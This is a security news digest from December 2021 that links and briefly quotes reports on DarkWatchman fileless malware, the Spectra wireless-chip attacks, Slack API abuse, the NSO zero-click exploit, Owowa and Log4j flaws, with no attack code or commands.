December 16, 2021

Fortify Security Team
Dec 16, 2021

Title: ‘DarkWatchman’ RAT Shows Evolution in Fileless Malware
Date Published: December 16, 2021

https://threatpost.com/darkwatchman-rat-evolution-fileless-malware/177091/

Excerpt: “Dubbed DarkWatchman, the RAT – discovered by researchers at Prevailion’s Adversarial Counterintelligence Team (PACT) – uses the registry on Windows systems for nearly all temporary storage on a machine and thus never writes anything to disk. This allows it “to operate beneath or around the detection threshold of most security tools,” PACT researchers Matt Stafford and Sherman Smith wrote in a report published late Tuesday.”

Title: Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
Date Published: December 16, 2021

https://thehackernews.com/2021/12/researchers-uncover-new-coexistence.html

Excerpt: “Dubbed”Spectra “,” the vulnerability class relies on the fact that transmissions happen in the same spectrum and wireless chips need to arbitrate the channel access. This breaks the separation between Wi-Fi and Bluetooth to result in denial-of-service on spectrum access, information disclosure, and even enable lateral privilege escalations from a Bluetooth chip to code execution on a Wi-Fi chip. “The Wi-Fi chip encrypts network traffic and holds the current Wi-Fi credentials, thereby providing the attacker with further information,” the researchers said. “Moreover, an attacker can execute code on a Wi-Fi chip even if it is not connected to a wireless network.””

Title: State-Sponsored Hackers Abuse Slack API to Steal Airline Data
Date Published: December 15, 2021

https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/

Excerpt: “Slack is an ideal platform for concealing malicious communications as the data can blend well with regular business traffic due to its widespread deployment in the enterprise. This type of abuse is a tactic that other actors have followed in the past, so it’s not a new trick. Also, Slack isn’t the only legitimate messaging platform to be abused for relaying data and commands covertly.

In this case, the Slack API is utilized by the Aclip backdoor to send system information, files, and screenshots to the C2, while receiving commands in return. IBM researchers spotted the threat actors abusing this communication channel in March 2021 and responsibly disclosed it to Slack.”

Title: Grindr Fined for Selling User Data to Advertisers Data to Advertisers
Date Published: December 16, 2021

https://blog.malwarebytes.com/reports/2021/12/grindr-fined-for-selling-user-data-to-advertisers/

Excerpt: “The Norwegian Data Protection Authority (Datatilsynet), ruled that the way in which Grindr collected user consent did not meet with the regulations stipulated in the EU GDPR. And, as such, the disclosure of personal data was in breach of the Privacy Ordinance. Users had to accept the privacy statement in its entirety to use the app, and they were not specifically asked if they would consent to disclosure to third parties for marketing purposes. In addition, information about the disclosure of personal information was not clear or accessible enough to users.”

Title: Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethiopia, Nigeria, India and More
Date Published: December 16, 2021

https://www.zdnet.com/article/variant-of-phorpiex-botnet-used-for-cryptocurrency-attacks-in-ethopia-nigeria-and-india/

Excerpt: “Check Point Research has discovered new attacks targeting cryptocurrency users in Ethiopia, Nigeria, India and 93 other countries. The cybercriminals behind the attacks are using a variant of the Phorpiex botnet — which CheckPoint called “Twizt” — to steal cryptocurrency through a process called “crypto clipping.”  Because of the length of wallet addresses, most systems copy a wallet address and allow you to simply paste it in during transactions. With Twizt, cybercriminals have been able to substitute the intended wallet address with the threat actor’s wallet address.”

Title: New Fileless Malware Uses Windows Registry as Storage to Evade Detection
Date Published: December 16, 2021

https://thehackernews.com/2021/12/new-fileless-malware-uses-windows.html

Excerpt: “The RAT “utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation,” researchers Matt Stafford and Sherman Smith said, adding it “represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools.””

Title: A Deep Dive into an NSO Zero-Click Imessage Exploit: Remote Code Execution
Date Published: December 15, 2021

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

Excerpt: “The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn’t need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it’s a weapon against which there is no defense.”

Title: Owowa, a Malicious IIS Server Module Used to Steal Microsoft Exchange Credentials
Date Published: December 16, 2021

https://securityaffairs.co/wordpress/125682/hacking/owowa-malicious-iis-server-module-used-to-steal-microsoft-exchange-credentials.html

Excerpt: “Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA),” reads the analysis published by Kaspersky. “When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server.”

Title: Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges
Date Published: December 15, 2021

https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html

Excerpt: “Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can “allow for exfiltration of sensitive data in certain circumstances.” Additional technical details of the flaw have been withheld to prevent further exploitation, but it’s not immediately clear if this has been already addressed in version 2.16.0.”

Title: Log4j: Making the Case for Structured Hunting
Date Published: December 16, 2021

https://cyborgsecurity.medium.com/log4j-making-the-case-for-structured-hunting-49f18c59d31b

Excerpt: “The Log4j vulnerability, without a doubt, is pretty bad. This is because, as a library, it isn’t as simple as compiling a list of affected applications or operating systems. It could be in almost anything. Similarly, it still isn’t known all the different methods of exploiting it. This means that the impact of this vulnerability will probably be felt by organizations for years to come. But, by taking a different approach and using threat hunting proactively, organizations can feel more confident in their ability to detect malicious activity regardless of the point of initial access.”

Recent Posts

September 16, 2022

Title: Uber hacked, internal systems breached and vulnerability reports stolen Date Published: September 16, 2022 https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Excerpt: “Uber suffered a...

September 15, 2022

Title: Webworm hackers modify old malware in new attacks to evade attribution Date Published: September 15, 2022 https://www.bleepingcomputer.com/news/security/webworm-hackers-modify-old-malware-in-new-attacks-to-evade-attribution/ Excerpt: “The Chinese 'Webworm'...

September 14, 2022

Title: Chinese hackers create Linux version of the SideWalk Windows malware Date Published: September 14, 2022 https://www.bleepingcomputer.com/news/security/chinese-hackers-create-linux-version-of-the-sidewalk-windows-malware/ Excerpt: “State-backed Chinese hackers...

September 13, 2022

Title: Cyberspies drop new infostealer malware on govt networks in Asia Date Published: September 13, 2022 https://www.bleepingcomputer.com/news/security/cyberspies-drop-new-infostealer-malware-on-govt-networks-in-asia/ Excerpt: “Security researchers have identified...

September 12, 2022

Title: Cisco confirms Yanluowang ransomware leaked stolen company data Date Published: September 12, 2022 https://www.bleepingcomputer.com/news/security/cisco-confirms-yanluowang-ransomware-leaked-stolen-company-data/ Excerpt: “Cisco has confirmed that the data leaked...

September 9, 2022

Title: Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/bumblebee-malware-adds-post-exploitation-tool-for-stealthy-infections/ Excerpt: “A new version of the...

September 8, 2022

Title: North Korean Lazarus Hackers Take Aim at U.S. Energy Providers Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/ Excerpt: “The North Korean APT group 'Lazarus' (APT38)...